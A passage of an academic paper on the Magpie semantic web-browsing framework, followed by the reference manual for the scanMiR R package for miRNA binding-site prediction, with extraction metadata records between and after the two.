ontology-derived lexicon enhanced by a few simple heuristics, which work ex- tremely fast. The lexicon entries are generated from the instances within the ontological knowledge base, which is populated from various the automatic annotation, and the dynamically generated semantic services. The former method accesses a physically linked content, whereas the latter method makes available the semantic context. Our interface differentiates the two methods to minimize confusion, and to emphasize the complementary nature of the two access mechanisms. 4.2 Trigger semantic services User-requested (on-demand) semantic services are one method for interacting with the relevant background knowledge. A different type of service gaining popularity are various agents-recommenders or advisers. These are active or push services, and they differ from the on-demand ones by their tendency to “look over the user’s shoulder”, gather facts, and present conclusions. In other words, they tend to be data-driven. In our case, a pre-condition for having active services is to keep history logs of browsing, particularly a log of the recognized entities. The label ‘browsing history’ is appropriate because a log accumulates findings not only from the current web page, but also from previously visited pages in the same browsing session. While an annotated web page is displayed in a browser, the recognized entities are asserted as facts into the Magpie semantic log KB. Several watchers monitor the patterns in the asserted facts. When the relevant assertions have been made for a particular watcher, a semantic service response is triggered, and applicable knowledge delivered to the Magpie plug-in that in turn displays it in a dedicated window next to the user’s web browser. In principle, this interaction is asynchronous – the service provider starts the communication, contacts the user’s dispatcher, and pushes potentially relevant information to the user. The information that can be pushed in this way may range from simple collections of relevant items to sophisticated guidance on browsing or browsing history visualization. Since the service provider (watcher) taps into a knowledge base constructed potentially from the logs of community members, the guidance or history visualization may draw on community knowledge and behaviors. This type of setup may seem surprising in the scenario presented earlier because a journalist is clearly not a member of KMi community. Does it make sense to send her community-relevant information? We believe that this approach corresponds to a journalist adopting the viewpoint of a specific community to interpret and make sense of a given web resource from the perspective of that community. Thus, a formal membership of a particular community and the utilization of their ontological viewpoints are two different roles that can be distinguished when using Magpie. Since a trigger service can be (in principle) subscribed to, it is useful to tap into the knowledge of a community of which the user is not a formal member. On the contrary, this enables him or her to see the document in its ‘native’ context. 4.3 Semantic ‘bookmarking’ The opportunity to adopt a particular viewpoint for interpreting web pages from a perspective of a given community has other benefits. One of them is the possibility to offer a dedicated tool for managing browsing history – using a particular viewpoint. Going back to the study of Tauscher and Greenberg [16] mentioned in the introduction, as many as 58% downloads of web pages are re-visits. One design recommendation from their study is that bookmarks should have a meaningful representation. History management based on the semantics of the visited pages, and implemented by a **triggered** semantic layer may help to alleviate issues with the syntactic and linear (access time ordered) methods. Instead of search browsing history records in an unnatural (for humans) space of URLs and access dates, we give users the opportunity to search a conceptual space containing entities with specific semantic meanings. Instead of plain URLs, our semantic logging works with URLs that are annotated and associated with concepts such as ‘Projects’ or ‘Research Areas’. A snapshot of Magpie “Where am I?” interface is shown in Fig. 3. It consists of an iconic bar (A) displaying visited pages graphically; list of neighbouring pages (B), ontological footprint of a particular page (C), and a semantic filter interface (D). The visited pages can be either browsed in a standard linear fashion, or filtered and searched using concepts from a particular ontology. This is the same ontology that was originally used to annotate the pages. An ontological footprint can be defined as a set of annotations that were automatically extracted from a particular web page. A footprint is thus a summary of a particular page from the perspective of a given ontology. The combination of seeing a web page in its ‘syntactic’2 neighbourhood superimposed by the ontological footprint is the primary novelty introduced by our Magpie framework. Semantic filters (see pointer D in Fig. 3) can be used to reduce the number of visible web pages from the user’s browsing history. An example of such a conceptual query trying to find a particular subset of web pages is shown in Fig. 4. The underlying ontology supports inference over a user-formulated query. For example, in our case, no member of KMi is working directly in the area of visualization but in related areas (such as software debugging and telepresence). Similarly, the research interests are associated with ‘research staff’, which is recognized as a sub-class of ‘academic’. | (and | | (academic ?X) | | (has-research-interest ?X visualization)) | Fig. 4. An example of a semantic filter using concepts from the ontology, which finds and shows only the web pages containing academics who work on visualization (see results in Fig. 5) 5 OVERVIEW OF SIMILAR WORK One of the inspirations for Magpie was the COHSE system [2]. COHSE combines an Open Hypermedia System with an ontology server into a framework for ontological linking – an ontology-derived lexicon is used to add links to arbitrary web pages. The links are added either by proxy server or by an augmented Mozilla browser. The distinctions between Magpie and COHSE are in their differing design goals. The goals for COHSE were (i) to separate web links and web pages, and (ii) to make these links conceptual (i.e. ontology-based). The goal for Magpie is to support interpretation and information gathering. Magpie’s interface enables entities to be recognized and annotated on the client side. Instead of embedding new relevant links into a document, Magpie offers class-dependent semantic services for each entity found. Magpie also offers **trigger** services via semantic logs. Neither type of Magpie service replaces traditional links; they are an auxiliary and extendible knowledge source available at the user’s fingertips. A number of tools support annotation of web pages. A classic example is the Amaya HTML editor that implements the Annotea infrastructure [8]. Annotea users may add various meta-statements to a document, which are separate from the document itself and are accessible to collaborating teams via a central annotation server. The annotation in this sense attaches additional information to a web page. This makes Annotea a powerful tool for joint authoring with a small group of collaborating agents sharing a common goal. However, this approach makes it difficult to facilitate annotation sharing in ‘open’ user communities. In these cases, there is no guarantee that a freely articulated annotation would convey the same meaning to the different users. Unlike Magpie, Annotea assumes that someone (author?) invests additional effort into making a page semantically rich. Magpie is more liberal and assumes a reader only subscribes to a domain ontology, which is then used to channel background knowledge. It may be argued that ontology creation takes more effort than manual document mark-up. This is true; however, ontology as a domain model can be re-used for different purposes, not only the annotation of one document. The effort spent on designing a shared ontology is greater in the short term but in the longer term, it is a more cost-effective way of recording a shared point of view. Moreover, ontologies are increasingly available for download, so often, no development is actually required. The CREAM-based Ont-O-Mat/Annotizer [7] is another tool integrating ontologies and information extraction tools. Annotations in this framework are close to those advocated in this paper. Any ontological instance, attribute or relation may be an annotation hook. A key feature of this tool is its use of discourse representations to structure the relatively flat output of information extraction tools according to the chosen ontology. CREAM’s annotation inferences resemble our trigger services produced by a data-driven reasoning. On the other hand, our ‘on-demand’ services seamlessly address the awareness of the existing relationships and the actual context of ontological instances. Sticky Notes [9] is a tool moving from the annotated web pages to using the annotations for finding items of interest. Their model focuses on the manual annotation, a kind of ‘notes on the margin’ of a particular web page. Being user-driven, a sticky note can reflect the user’s intention or internal conceptualization (e.g. ‘**this idea shall improve turnover**’ in addition to the explicit meta-data (e.g. ‘authored-by’)). The authors propose a high-level language for querying such annotations. Magpie creates conceptual annotations of web pages automatically. Therefore, it cannot express users’ intentions. However, the concepts used in annotation are sufficiently high-level to allow users to query their browsing history in these conceptual terms. While the ‘Sticky Notes’ approach helps with managing personal experiences, it does not lend itself to an automated support for sense-making. Our Magpie assists with finding the web pages, as well as their contextual interpretation. Another strand of research relevant to Magpie framework involves Letizia [11], and the idea of a reconnaissance agent. Such an agent “looks out for the information relevant to the user”. In terms of web browsing, pre-filtering the links from a web page may improve the relevance and usefulness of browsing. The functionality similar to that of Letizia (“local reconnaissance”) is implemented in Magpie by semantic logging and ontological reasoning with the semantic log. Unlike Letizia, Magpie does not offer any recom- --- 2 As before, by ‘syntactic’ we mean pages linked through <A HREF=.../> anchors as defined by web page author. mendation. Furthermore, Magpie uses an available (and shared) ontological lexicon for NER and annotation rather than specific examples provided to an agent to generalize and learn patterns [10]. Our framework is focused on using the neighbourhood information for filtering and making sense of web pages visited in the past. The history access and awareness is important because it enables users to trace particular concepts back to the pages, where they were first encountered. Concept tracing throughout a browsing session was piloted in e-commerce applications such as the ZStep-based Woodstein tool [12] that used a (browsing) history to debug user-computer interaction during an e-commerce session. Another stream of research using high-level conceptual annotations of web pages to reason about them comprises the vision of a pervasive ‘Memex’ environment [3] for recording both an individual’s as well as community browsing experience. Another similarity between the concepts of reconnaissance agents and user interaction debuggers is the idea of “zero input” or “one-click” interaction. Similarly to Letizia and Woodstein, our Magpie uses the information already present in the web page without asking the user to provide any queries or search keywords. Our approach performs the annotation on the client’s browser and provides a host of relevant services ‘one click away’ from the annotated web page. The services might be distributed around the Web. The only time when we break this rule in Magpie is our browsing history manager. In that case, it may be useful to allow the user formulate a simple query in a high-level conceptual language rather than logic (as most search engines do). 6 CONCLUSIONS Reducing the information overload from the expanding web is often cited as the premise for work on supporting the retrieval of relevant documents. But finding relevant documents is only half of the story. Their interpretation involves a reader in understanding the context, in which the document was created. To gain the full insight, a reader requires knowledge of the specific terms mentioned and the implicit relationships contained both within the document and between the document and external knowledge sources. Magpie addresses this issue by capturing context within an ontology, which then is used to enrich web documents with a semantic layer. Semantic services expose relevant segments of the ontology according to the user’s needs. The choice of ontological viewpoint for interpreting a particular web page drives the interpretation bottom-up – by the user rather than domain expert or knowledge engineer. Magpie users browse the web in a standard way with negligible differences in their user experience. Magpie achieves this by extending standard web browsers with standard mark-up languages, without altering the layout of the web page and imposing any significant time overhead. The key principle is that the user controls what extent semantic browsing comes to the fore. The Magpie toolbar enables concepts highlighting according to their ontological class, and the Magpie infrastructure enables arbitrary semantic actions to be triggered by patterns of items found within a semantic log. Trigger services also allow certain tasks to be delegated. In the scenario we showed how discovered entities could be used for a later inspection. However, Magpie allows more complex trigger services to be implemented. One example of such a complex service has been described in this paper as a tool for the semantic management of browsing history. This tool draws on the enriched semantic annotation of the web pages within a user’s browsing history. In addition to the access times and URLs it offers an ontological footprint, which was created by an automatic annotation at the time user browsed the page. The combination of semantic footprints with web pages automatically annotated using the concepts constituting the footprints facilitates a conceptual search of previously visited pages. We believe that the abilities to find the right page and make sense of it easily are two fundamental activities contributing to the wider adoption of Semantic Web technologies. Attention as opposed to information is now widely acknowledged to be the scarce resource in the Internet age. Consequently, tools that can leverage semantic resources to take some of the burden of the interpretation task from the human reader are going to be of enormous use. We believe that Magpie is a step towards achieving this goal. Fig. 5. “Where am I” – a semantic filter applied on the user’s browsing history reduces the number of records shown A (semantic filter, see also Fig. 4) Our current effort is focused on deploying the Magpie tools in the climateprediction.net project. Using the scheme that was successfully deployed in the SETI@home project, the climateprediction.net exploits the idle time on PCs to run multiple versions of the UK Met Office climate model. Running large numbers of perturbed climate models (the project aims to collect 2M users) will overcome uncertainties present in the modeling (and hence prediction) process. During their participation in the project, the users would run climate models on their computers for several months. Magpie will be used for the purposes of interacting with and making sense of highly complex analyses of climate data that will be produced from running a statistical ensemble of perturbed climate models. Magpie will also enable lay members of the public to explore the rich scientific resources that exist in the domain of climatology and climate prediction. Thus, it is hoped that the semantic browsing capabilities of Magpie will serve as an enabling technology for the increased public understanding of science. 7 ACKNOWLEDGMENTS The Magpie research is supported by the Advanced Knowledge Technologies (AKT) and climateprediction.net projects. AKT is an Interdisciplinary Research Collaboration (IRC) sponsored by the UK Engineering and Physical Sciences Research Council by grant no. GR/N15764/01. The AKT IRC comprises the Universities of Aberdeen, Edinburgh, Sheffield, Southampton and The Open University. Climateprediction.net is sponsored by the UK Natural Environment Research Council and UK Department of Trade e-Science Initiative, and involves Oxford University, CLRC Rutherford Appleton Labs and The Open University. 8 REFERENCES
{"Source-Url": "http://oro.open.ac.uk/2972/1/domingue-dzbor-motta-iui2004.pdf", "len_cl100k_base": 6097, "olmocr-version": "0.1.48", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 23020, "total-output-tokens": 7461, "length": "2e12", "weborganizer": {"__label__adult": 0.00035500526428222656, "__label__art_design": 0.0015363693237304688, "__label__crime_law": 0.0004792213439941406, "__label__education_jobs": 0.003086090087890625, "__label__entertainment": 0.0003616809844970703, "__label__fashion_beauty": 0.0002532005310058594, "__label__finance_business": 0.0005998611450195312, "__label__food_dining": 0.0003910064697265625, "__label__games": 0.0008449554443359375, "__label__hardware": 0.0011348724365234375, "__label__health": 0.0007834434509277344, "__label__history": 0.0008192062377929688, "__label__home_hobbies": 0.00015223026275634766, "__label__industrial": 0.0004601478576660156, "__label__literature": 0.0015392303466796875, "__label__politics": 0.0004515647888183594, "__label__religion": 0.000743865966796875, "__label__science_tech": 0.365966796875, "__label__social_life": 0.00033593177795410156, "__label__software": 0.190673828125, "__label__software_dev": 0.427978515625, "__label__sports_fitness": 0.00023281574249267575, "__label__transportation": 0.0005998611450195312, "__label__travel": 0.0003294944763183594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 34198, 0.01896]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 34198, 0.56789]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 34198, 0.90478]], "google_gemma-3-12b-it_contains_pii": [[0, 763, false], [763, 5253, null], [5253, 8706, null], [8706, 14643, null], [14643, 18102, null], [18102, 25256, null], [25256, 29943, null], [29943, 34198, null]], "google_gemma-3-12b-it_is_public_document": [[0, 763, true], [763, 5253, null], [5253, 8706, null], [8706, 14643, null], [14643, 18102, null], [18102, 25256, null], [25256, 29943, null], [29943, 34198, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 34198, null]], "pdf_page_numbers": [[0, 763, 1], [763, 5253, 2], [5253, 8706, 3], [8706, 14643, 4], [14643, 18102, 5], [18102, 25256, 6], [25256, 29943, 7], [29943, 34198, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 34198, 0.02206]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
6d60c19f795712e4badb65f58dab1ab299166b35
Package ‘scanMiR’ May 28, 2024 Type Package Title scanMiR Version 1.10.0 Depends R (>= 4.0) Date 2024-04-24 Imports Biostrings, pwalign, GenomicRanges, IRanges, data.table, BiocParallel, methods, GenomeInfoDb, S4Vectors, ggplot2, stats, stringi, utils, graphics, grid, seqLogo, cowplot Suggests knitr, rmarkdown, BiocStyle, testthat (>= 3.0.0) Description A set of tools for working with miRNA affinity models (KdModels), efficiently scanning for miRNA binding sites, and predicting target repression. It supports scanning using miRNA seeds, full miRNA sequences (enabling 3' alignment) and KdModels, and includes the prediction of slicing and TDMD sites. Finally, it includes utility and plotting functions (e.g. for the visual representation of miRNA-target alignment). License GPL-3 VignetteBuilder knitr RoxygenNote 7.3.1 biocViews miRNA, SequenceMatching, Alignment Config/testthat/edition 3 git_url https://git.bioconductor.org/packages/scanMiR git_branch RELEASE_3_19 git_last_commit e3e2d6f git_last_commit_date 2024-04-30 Repository Bioconductor 3.19 Date/Publication 2024-05-27 Author Pierre-Luc Germain [cre, aut] (<https://orcid.org/0000-0003-3418-4218>), Michael Soutschek [aut], Fridolin Gross [aut] Maintainer Pierre-Luc Germain <pierre-luc.germain@hest.ethz.ch> aggregateMatches Description Aggregates miRNA binding sites with log_kd values to predict transcript repression. See the vignette for more detail. Usage ```r aggregateMatches( m, a = 0.007726, b = 0.5735, c = 0.181, p3 = 0.051, coef_utr = 0, coef_orf = 0, p3.range = c(3L, 8L), keepSiteInfo = TRUE, toInt = FALSE, BP = NULL ) ``` **assignKdType** **Arguments** - **m**: A GRanges or data.frame of matches as returned by ‘findSeedMatches’. - **a**: The relative concentration of unbound AGO-miRNA complexes. - **b**: Factor specifying the additional repression by a single bound AGO. - **c**: Penalty for sites that are found within the ORF region. - **p3**: Factor specifying additional repression due to 3p alignment. - **coef_utr**: Factor specifying additional repression due to UTR length. - **coef_orf**: Factor specifying additional repression due to ORF length. - **p3.range**: Range used for 3p alignment. - **keepSiteInfo**: Logical; whether to return information about site types (default = TRUE). Ignored if ’m’ does not contain ‘log_kd’ values. - **toInt**: Logical; whether to convert repression scores to integers (default = FALSE). - **BP**: Pass ‘BiocParallel::MulticoreParam(ncores, progressbar=TRUE)’ to enable multithreading. Note that in addition, ‘aggregateMatches’ uses the data.table package, which is often set to use multi-threading by default (which would be multiplied by threads determined by ’BP’). See setDTthreads for more information. **Value** A data.frame containing aggregated repression values and/or information about the numbers and types of matches. **Examples** ```r # we create mock RNA sequences and seeds: seqs <- getRandomSeq(n=10) # load sample KdModel data(SampleKdModel) # find matches matches <- findSeedMatches(seqs, SampleKdModel) # aggregate matches aggregateMatches(matches) ``` **Description** Assigns a log_kd and match type to a set of matched sequences. **Usage** ```r assignKdType(x, mod, mer8 = NULL) ``` conservation Arguments x A vector of matched sequences, each of 12 nucleotides mod An object of class ‘KdModel’ mer8 The optional set of 8mers included in the model (for internal use; can be reconstructed from the model). Value A data.frame with one row for each element of ‘x’, and the columns ‘type’ and ‘log_kd’. To save space, the reported log_kd is multiplied by 1000, rounded and saved as an integer. Examples data(SampleKdModel) assignKdType(c("CTAGCATTAAGT","ACGTACGTACGT"), SampleKdModel) --- conservation Description conservation Usage conservation(x) Arguments x A KdModelList, or a KdModel Value A vector of the conservation status for each miRNA Examples data(SampleKdModel) conservation(SampleKdModel) dummyKdData Create dummy log_kd per 12-mer data **Description** Create dummy log_kd per 12-mer data **Usage** dummyKdData(mod = NULL) **Arguments** - **mod** Optional model from which to create the dummy data **Value** A data.frame with 12-mers and log_kds **Examples** kd <- dummyKdData() findSeedMatches Predicting and characterizing miRNA binding sites **Description** ‘findSeedMatches’ takes a set of sequences and a set of miRNAs (given either as target seeds, mature miRNA sequences, or a KdModelList). **Usage** findSeedMatches( seqs, seeds, shadow = 0L, onlyCanonical = FALSE, maxLogKd = c(-1, -1.5), keepMatchSeq = FALSE, minDist = 7L, p3.extra = FALSE, p3.params = list(maxMirLoop = 7L, maxTargetLoop = 9L, maxLoopDiff = 4L, mismatch = TRUE, GUwob = TRUE), agg.params = .defaultAggParams(), ret = c("GRanges", "data.frame", "aggregated"), Arguments seqs A character vector or 'DNAStringSet' of DNA sequences in which to look. seeds A character vector of 7-nt seeds to look for. If RNA, will be reversed and complemented before matching. If DNA, they are assumed to be the target sequence to look for. Alternatively, a list of objects of class 'KdModel' or an object of class 'KdModelList' can be given. shadow Integer giving the shadow, i.e. the number of nucleotides hidden at the beginning of the sequence (default 0). onlyCanonical Logical; whether to restrict the search only to canonical binding sites. maxLogKd Maximum log_kd value to keep. This has a major impact on the number of sites returned, and hence on the memory requirements. Set to Inf to disable (not recommended when running large scans!). keepMatchSeq Logical; whether to keep the sequence (including flanking dinucleotides) for each seed match (default FALSE). minDist Integer specifying the minimum distance between matches of the same miRNA (default 7). Closer matches will be reduced to the highest-affinity. To disable the removal of overlapping features, use 'minDist=-Inf'. p3.extra Logical; whether to keep extra information about 3' alignment. Disable (default) this when running large scans, otherwise you might hit your system's memory limits. p3.params Named list of parameters for 3' alignment with slots 'maxMirLoop' (integer, default = 7), 'maxTargetLoop' (integer, default = 9), 'maxLoopDiff' (integer, default = 4), 'mismatch' (logical, default = TRUE) and 'GUwob' (logical, default = TRUE). agg.params A named list with slots 'a', 'b', 'c', 'p3', 'coef_utr', 'coef_orf' and 'keepSiteInfo' indicating the parameters for the aggregation. Ignored if 'ret'="aggregated". For further details see documentation of 'aggregateMatches'. ret The type of data to return, either "GRanges" (default), "data.frame", or "aggregated" (aggregates affinities/sites for each seed-transcript pair). BP Pass 'BiocParallel::MulticoreParam(ncores, progressbar=TRUE)' to enable multithreading. verbose Logical; whether to print additional progress messages (default on if not multithreading) n_seeds Integer; the number of seeds that are processed in parallel to avoid memory issues. get3pAlignment useTmpFiles Logical; whether to write results for single miRNAs in temporary files (ignored when scanning for a single seed). Alternatively, ‘useTmpFiles’ can be a character vector of length 1 indicating the path to the directory in which to write temporary files. keepTmpFiles Logical; whether to keep the temporary files at the end of the process; ignored if ‘useTmpFiles=FALSE’. Temporary files are removed only upon successful completion of the function, meaning that they will not be deleted in case of errors. Value A GRanges of all matches. If ‘seeds’ is a ‘KdModel’ or ‘KdModelList’, the ‘log_kd’ column will report the ln(Kd) multiplied by 1000, rounded and saved as an integer. If ‘ret!="GRanges", returns a data.frame. Examples # we create mock RNA sequences and seeds: segs <- getRandomSeq(n=10) seeds <- c("AAACCAC", "AAACCUU") findSeedMatches(segs, seeds) get3pAlignment Finds 3' complementary binding of a miRNA Description Performs a local alignment of the miRNA 3' sequence (determined by 'mir3p.start') on given the given sequences. Usage get3pAlignment( segs, mirseq, mir3p.start = 9L, allow.mismatch = TRUE, maxMirLoop = 7L, maxTargetLoop = 9L, maxLoopDiff = 4L, TGsub = TRUE, siteType = NULL ) get8merRange Arguments seqs A set of sequences in which to look for 3’ matches (i.e. upstream of the seed match) mirseq The sequence of the mature miRNA mir3p.start The position in ‘mirseq’ in which to start looking allow.mismatch Logical; whether to allow mismatches maxMirLoop Maximum miRNA loop size maxTargetLoop Maximum target loop size maxLoopDiff Maximum size difference between miRNA and target loops TGsub Logical; whether to allow T/G substitutions. siteType The optional type of seed-complementarity, as returned by `getMatchTypes`. This is needed to identify slicing/TDMD sites. If given, should be a vector of the same length as ‘seqs’. Value A data.frame with one row for each element of ‘seqs’, indicating the size of the miRNA bulge, the size of the target mRNA bulge, the number of mismatches at the 3’ end, and the partial 3’ alignment score (i.e. roughly the number of consecutive matching nucleotides) Examples get3pAlignment(seqs="NNAGTGTGCCATNN", mirseq="TGGAGTGTGACAATGGTGTTTG") data("SampleKdModel") get8merRange(SampleKdModel) Description Returns the minimum and maximum 8-mer log-kd values Usage get8merRange(mod) Arguments mod A ‘KdModel’ Value A numeric vector of length two Examples data("SampleKdModel") get8merRange(SampleKdModel) **getKdModel** --- **Description** getKdModel **Usage** getKdModel(kd, mirseq = NULL, name = NULL, conservation = NA_integer_, ...) **Arguments** kd A data.frame containing the log_kd per 12-mer sequence, or the path to a text/csv file containing such a table. Should contain the columns 'log_kd', '12mer' (or 'X12mer'), and eventually 'mirseq' (if the 'mirseq' argument is NULL) and 'mir' (if the 'name' argument is NULL). mirseq The miRNA (cDNA) sequence. name The name of the miRNA. conservation The conservation level of the miRNA. See `scanMiR:::.conservation_levels()` for possible values. ... Any additional information to be saved with the model. **Value** An object of class 'KdModel'. **Examples** kd <- dummyKdData() mod <- getKdModel(kd=kd, mirseq="TTAATGCTAATCGTGATAGGGT", name="my-miRNA") --- **getKmers** --- **Description** Returns all combinations of ‘n’ elements of ‘from’ **Usage** getKmers(n = 4, from = c("A", "C", "G", "T")) getMatchTypes Arguments n Number of elements from Letters sampled Value A character vector Examples getKmers(3) Description Given a seed and a set of sequences matching it, returns the type of match. Usage getMatchTypes(x, seed, checkWobble = TRUE) Arguments x A character vector of short sequences. seed A 7 or 8 nucleotides string indicating the seed (5' to 3' sequence of the target RNA). If of length 7, an "A" will be appended. checkWobble Whether to flag wobbled sites Value A factor of match types. Examples x <- c("AACACTCCAG", "GACACTCCGC", "GTACTCCAT", "ACGTACGTAC") getMatchTypes(x, seed="ACACTCCA") **getRandomSeq** **Description** Produces a random sequence of the given letters **Usage** ```r getRandomSeq(length = 3000, alphabet = c("A", "C", "G", "T"), n = 1) ``` **Arguments** - `length`: Length of the sequence - `alphabet`: Letters from which to sample - `n`: The number of sequences to generate **Value** A character vector of length 1 **Examples** ```r generateRandomSeq(100) ``` --- **getSeed8mers** **Description** Generates all possible 8mers with 4 consecutive and positioned matches to a given seed. **Usage** ```r generateSeed8mers(seed, addNs = FALSE) ``` **Arguments** - `seed`: The miRNA seed (target DNA sequence), a character vector of length 8 (if of length 7, a "A" will be added on the right) - `addNs`: Logical; whether to include 8mers with one flanking N **Value** A vector of 1024 8mers. Examples head(getSeed8mers("ACACTCCA")) KdModel miRNA affinity models Description Methods for the KdModel class Usage ## S4 method for signature 'KdModel' show(object) ## S4 method for signature 'KdModel' summary(object) ## S4 method for signature 'KdModel' c(x, ...) Arguments object, x, ... An object of class KdModel Value Depends on the method. See Also KdModel, KdModelList Examples data(SampleKdModel) SampleKdModel summary(SampleKdModel) KdModelList-class Description KdModelList Usage KdModelList(..., description = NULL, makeUnique = FALSE) Arguments ... Any number of KdModel objects or lists thereof. description A description for the collection. makeUnique Logical; whether to rename models if names are duplicated. Value A KdModelList Examples data(SampleKdModel) mods <- KdModelList(SampleKdModel, SampleKdModel, makeUnique = TRUE) mods KdModelList-methods Methods for the KdModelList classes Description Methods for the KdModelList classes Usage ## S4 method for signature 'KdModelList' summary(object) ## S4 method for signature 'KdModelList,ANY' x[i, j = NULL, ..., drop = TRUE] Arguments object, x An object of class KdModelList i the index of item(s) to select j, drop,... ignored Description Plots the summary of an affinity model. Usage plotKdModel(mod, what = c("both", "seeds", "logo"), n = 10) Arguments mod A ‘KdModel’ what Either ‘seeds’, ‘logo’, or ‘both’ (default). n The number of top 7-mers to plot (when ‘what=’seeds’" Details ‘what=’seeds’" plots the -$\log(K_d)$ values of the top ‘n’ 7-mers (including both canonical and non-canonical sites), with or without the final "A" vis-a-vis the first miRNA nucleotide. ‘what=’logo’" plots a ‘seqLogo’ (requires the [seqLogo]https://bioconductor.org/packages/release/bioc/html/seqLogo.html package) showing the nucleotide-wise information content and preferences for all 12-mers (centered around the seed, oriented in the direction of the target mRNA). ‘what=’both’" plots both. Note that if the package ‘ggseqlogo’ is installed, this will be used instead to plot the logo, resulting in more detailed plot annotation. Value If ‘what=’logo’", returns nothing and plots a position weight matrix. Otherwise returns a ggplot. Examples ```r data(SampleKdModel) plotKdModel(SampleKdModel, what="seeds") ``` Description Removes elements from a GRanges that overlap (or are within a given distance of) other elements higher up in the list (i.e. assumes that the ranges are sorted in order of priority). The function handles overlaps between more than two ranges by successively removing those that overlap higher-priority ones. Usage ```r removeOverlappingRanges( x, minDist = 7L, retIndices = FALSE, ignore.strand = FALSE ) ``` Arguments - `x` A GRanges, sorted by (decreasing) importance. - `minDist` Minimum distance between ranges. - `retIndices` Logical; whether to return the indices of entries to remove, rather than the filtered GRanges. - `ignore.strand` Logical. Whether the strand of the input ranges should be ignored or not. Value A filtered GRanges, or an integer vector of indices to be removed if `retIndices==TRUE`. Examples ```r library(GenomicRanges) gr <- GRanges(seqnames=rep("A",4), IRanges(start=c(10,25,45,35), width=6)) removeOverlappingRanges(gr, minDist=7) ``` SampleKdModel Example KdModel (hsa-miR-155-5p) Description Value a ‘KdModel’ object Examples data(SampleKdModel) SampleKdModel SampleTranscript Example transcript sequence Description An artificial transcript sequence used for examples. Value a named character vector of length 1. viewTargetAlignment viewTargetAlignment Description viewTargetAlignment Usage viewTargetAlignment( m, miRNA, seqs = NULL, flagBulgeMatches = FALSE, p3.params = list(), min3pMatch = 3L, hideSingletons = FALSE, UGsub = TRUE, ..., outputType = c("print", "data.frame", "plot", "ggplot") ) Arguments m A GRanges of length 1 giving the information for a given match, as produced by findSeedMatches. miRNA A miRNA sequence, or a KdModel object of the miRNA corresponding to the match in 'm'; alternatively, a KdModelList including the model. seqs The sequences corresponding to the seqnames of 'm'. Not needed if 'm' contains the target sequences. flagBulgeMatches Logical; whether to flag matches inside the bulge (default FALSE) p3.params See findSeedMatches. min3pMatch The minimum 3' alignment for any to be plotted hideSingletons Logical; whether to hide isolated single base-pair matches UGsub Logical; whether to show U-G matches ... Passed to 'text' if 'outputType="plot"'. outputType Either 'print' (default, prints to console), 'data.frame', or 'plot'. Value Returns nothing 'outputType="print"'. If 'outputType="data.frame"', returns a data.frame containing the alignment strings; if 'outputType="ggplot"' returns a 'ggplot' object. Examples data(SampleKdModel) seq <- c(seq1="CGACCCCTATCACGTCCGCAGCATTAAAT") m <- findSeedMatches(seq, SampleKdModel, verbose=FALSE) viewTargetAlignment(m, miRNA=SampleKdModel, seqs=seq) Index [,KdModelList,ANY-method (KdModelList-methods), 13 [,] ,KdModelList-methods, KdModelList-method (KdModelList-methods), 13 aggregateMatches, 2 assignKdType, 3 KdModel, 12, 12, 13, 14, 17 KdModel-class (KdModel), 12 KdModel-methods (KdModel), 12 KdModelList, 5, 12–14, 17 KdModelList (KdModelList-class), 13 KdModelList-class, 13 KdModelList-methods, 13 KdModelList-methods, KdModelList-method (KdModelList-methods), 13 plotKdModel, 14 removeOverlappingRanges, 15 SampleKdModel, 16 SampleTranscript, 16 setDTthreads, 3
{"Source-Url": "https://www.bioconductor.org/packages/release/bioc/manuals/scanMiR/man/scanMiR.pdf", "len_cl100k_base": 4992, "olmocr-version": "0.1.53", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 33968, "total-output-tokens": 6198, "length": "2e12", "weborganizer": {"__label__adult": 0.00031828880310058594, "__label__art_design": 0.0004329681396484375, "__label__crime_law": 0.0003740787506103515, "__label__education_jobs": 0.0007505416870117188, "__label__entertainment": 0.00022482872009277344, "__label__fashion_beauty": 0.00016498565673828125, "__label__finance_business": 0.0002105236053466797, "__label__food_dining": 0.0004398822784423828, "__label__games": 0.0009026527404785156, "__label__hardware": 0.0014619827270507812, "__label__health": 0.0006361007690429688, "__label__history": 0.00025916099548339844, "__label__home_hobbies": 0.00017535686492919922, "__label__industrial": 0.0005121231079101562, "__label__literature": 0.00022590160369873047, "__label__politics": 0.0003662109375, "__label__religion": 0.0005068778991699219, "__label__science_tech": 0.11212158203125, "__label__social_life": 0.0001710653305053711, "__label__software": 0.06024169921875, "__label__software_dev": 0.81884765625, "__label__sports_fitness": 0.0004193782806396485, "__label__transportation": 0.00027680397033691406, "__label__travel": 0.00021791458129882812}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 17921, 0.02272]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 17921, 0.78086]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 17921, 0.63557]], "google_gemma-3-12b-it_contains_pii": [[0, 1363, false], [1363, 1719, null], [1719, 3365, 